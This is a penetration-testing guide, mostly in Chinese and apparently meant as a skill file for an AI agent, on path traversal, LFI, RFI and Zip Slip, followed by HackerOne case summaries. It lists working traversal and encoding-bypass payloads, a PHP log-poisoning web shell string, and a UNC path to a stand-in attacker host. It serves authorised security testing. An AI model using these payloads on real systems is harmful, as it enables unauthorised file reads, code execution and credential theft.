Path Traversal Penetration Testing Patterns
当对 Web 应用进行路径穿越和文件包含渗透测试时加载此 Skill。覆盖 LFI、RFI、Zip Slip 等。
Attack Surface Discovery
高风险功能:
- 文件下载/查看:
/download?file=report.pdf、/view?path=image.png
- 模板/主题选择:
?template=default、?theme=dark
- 日志查看器:
/logs?file=access.log
- 文件上传后的处理(解压、预览)
- 备份/导出功能
- 静态资源服务:
/static/、/assets/ 路径
- 语言/区域设置:
?lang=en、?locale=zh-CN
识别信号:
- 参数值看起来像文件路径或文件名
- 响应中包含文件内容(而非数据库数据)
- 文件扩展名出现在参数中
- 错误信息暴露文件系统路径
Exploitation Techniques
基础路径穿越:
# Linux
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
# Windows
..\..\..\windows\win.ini
..%5c..%5c..%5cwindows\win.ini
编码绕过:
# URL 编码
%2e%2e%2f → ../
%2e%2e/ → ../
..%2f → ../
# 双重编码
%252e%252e%252f → ../
# Unicode/UTF-8
..%c0%af → ../ (过长 UTF-8)
..%ef%bc%8f → ../ (全角斜杠)
# Null byte (旧版 PHP/Java)
../../../etc/passwd%00.png
../../../etc/passwd\0.png
Windows 特定技巧:
- 设备名绕过:
CON、PRN、AUX、NUL 可用于绕过路径规范化
- UNC 路径:
\\attacker.com\share\file 触发 SSRF 或凭证泄露
- 短文件名:
PROGRA~1 替代 Program Files
- ADS(备用数据流):
file.txt::$DATA
Node.js 特定:
- Buffer 内部操作绕过路径检查
Uint8Array 中存储路径绕过权限模型path.normalize() 与实际文件访问的行为差异
Java/Spring 特定:
- Spring URL 路径规范化差异:
/static/..;/admin/secret 绕过 Spring Security
- URL classloader:
jar:file:///path/to/archive.jar!/entry 读取 jar 内文件
- Tomcat
%252F 双重编码绕过路径过滤
PHP 特定(LFI to RCE):
- PHP wrapper:
php://filter/convert.base64-encode/resource=config.php 读取源码
- PHP input:
php://input + POST body 包含 PHP 代码
- Log poisoning:User-Agent 注入
<?php system($_GET['cmd']); ?>,然后 LFI 包含日志文件
- Session 文件包含:
/tmp/sess_SESSIONID 中注入 PHP 代码后包含执行
Zip Slip / 符号链接攻击:
- 上传包含
../../ 路径条目的压缩包
- 上传包含符号链接的 tar/zip 文件
- 解压后覆盖任意文件(配置文件、webshell)
Detection Checklist
Impact Assessment
漏洞利用可达到的效果:
- 敏感文件读取:源代码、配置文件(数据库凭证、API 密钥)、
/etc/shadow
- 任意文件写入:通过 Zip Slip 或写入功能上传 webshell,获取 RCE
- 代码执行:LFI + 日志投毒(将 PHP 代码写入日志后包含执行)
- 凭证泄露:读取
.env、config.yaml、SSH 密钥等
严重度判断:
- Critical:可读取数据库凭证/密钥文件 + 可利用获得 RCE
- High:可读取任意文件(源码、配置)、可写入任意位置
- Medium:仅可读取有限文件、路径受限无法跨目录
Real-World Cases
以下案例来自 HackerOne 公开披露的真实漏洞报告,展示了该类漏洞在实际目标中的表现形式。
Case 1: IBM — Path Traversal Vulnerability found on IBM Cloud
- 严重度: Critical | CWE: Path Traversal
- 摘要: The path traversal vulnerability on IBM Cloud was reported by an external researcher, analyzed, and remediated. The vulnerability has been addressed.
- 报告: https://hackerone.com/reports/3060373
Case 2: Basecamp — Arbitrary write in the application's data folder and arbitrary read of server's replies from 3rd party apps.
- 严重度: High | CWE: Path Traversal
- 摘要: A path traversal vulnerability was found in the Android app
com.basecamp.bc3 version 3.26.3, allowing an attacker to write arbitrary files in the app's private directory. Additionally, the attacke...
- 报告: https://hackerone.com/reports/1710541
Case 3: ExpressionEngine — Non-authenticated path traversal leading to arbitrary file read
- 严重度: High | CWE: Path Traversal
- 摘要: Non-authenticated path traversal leading to arbitrary file read. Insufficient user input filtering resulted in arbitrary file read by non-authenticated attacker, leading to sensitive information discl...
- 报告: https://hackerone.com/reports/1096043
Case 4: Internet Bug Bounty — Path traversal by monkey-patching Buffer internals
- 严重度: High | CWE: Path Traversal
- 摘要: In Node.js 20 and 21, a path traversal vulnerability was introduced due to the ability to monkey-patch Buffer internals. By overwriting Buffer.prototype.utf8Write, an attacker could bypass the path re...
- 报告: https://hackerone.com/reports/2434811
Case 5: Internet Bug Bounty — Path traversal through path stored in Uint8Array in Node.js 20
- 严重度: High | CWE: Path Traversal
- 摘要: A path traversal vulnerability was discovered in Node.js 20 through paths stored in Uint8Array objects. The vulnerability allowed bypassing path sanitization protections and reading arbitrary files ou...
- 报告: https://hackerone.com/reports/2256167
Case 6: Internet Bug Bounty — Permission model improperly protects against path traversal in Node.js 20
- 严重度: High | CWE: Path Traversal
- 摘要: A path traversal vulnerability was introduced in Node.js 20 due to insufficient patching of CVE-2023-30584. The vulnerability arises because the permission model implementation does not protect itself...
- 报告: https://hackerone.com/reports/2225660
Case 7: Internet Bug Bounty — (CVE-2023-32004) Permission model bypass by specifying a path traversal sequence in a Buffer
- 严重度: High | CWE: Path Traversal
- 摘要: A vulnerability was discovered in Node.js version 20, specifically within the experimental permission model. It allowed for a bypass of the permission model by specifying a path traversal sequence in ...
- 报告: https://hackerone.com/reports/2104564
Case 8: Mozilla — Mozilla VPN Clients: RCE via file write and path traversal
- 严重度: High | CWE: Path Traversal
- 摘要: The report describes a path traversal vulnerability in the Mozilla VPN client software that allowed for remote code execution. The vulnerability was found in the "live_reload" command of the client's ...
- 报告: https://hackerone.com/reports/2995025
Case 9: Node.js — Windows Device Names (CON, PRN, AUX) Bypass Path Traversal Protection in path.normalize()
- 严重度: High | CWE: Path Traversal
- 摘要: An incomplete fix has been identified for a vulnerability affecting Windows device names in the
path.normalize() function in Node.js. The vulnerability allows path traversal protection to be bypasse...
- 报告: https://hackerone.com/reports/3160912
Case 10: Node.js — Path traversal by monkey-patching Buffer internals
- 严重度: High | CWE: Path Traversal
- 摘要: A path traversal vulnerability was introduced in the experimental permission model in Node.js 20 and 21 by monkey-patching Buffer internals. This allowed modification of the result of path.resolve(), ...
- 报告: https://hackerone.com/reports/2218653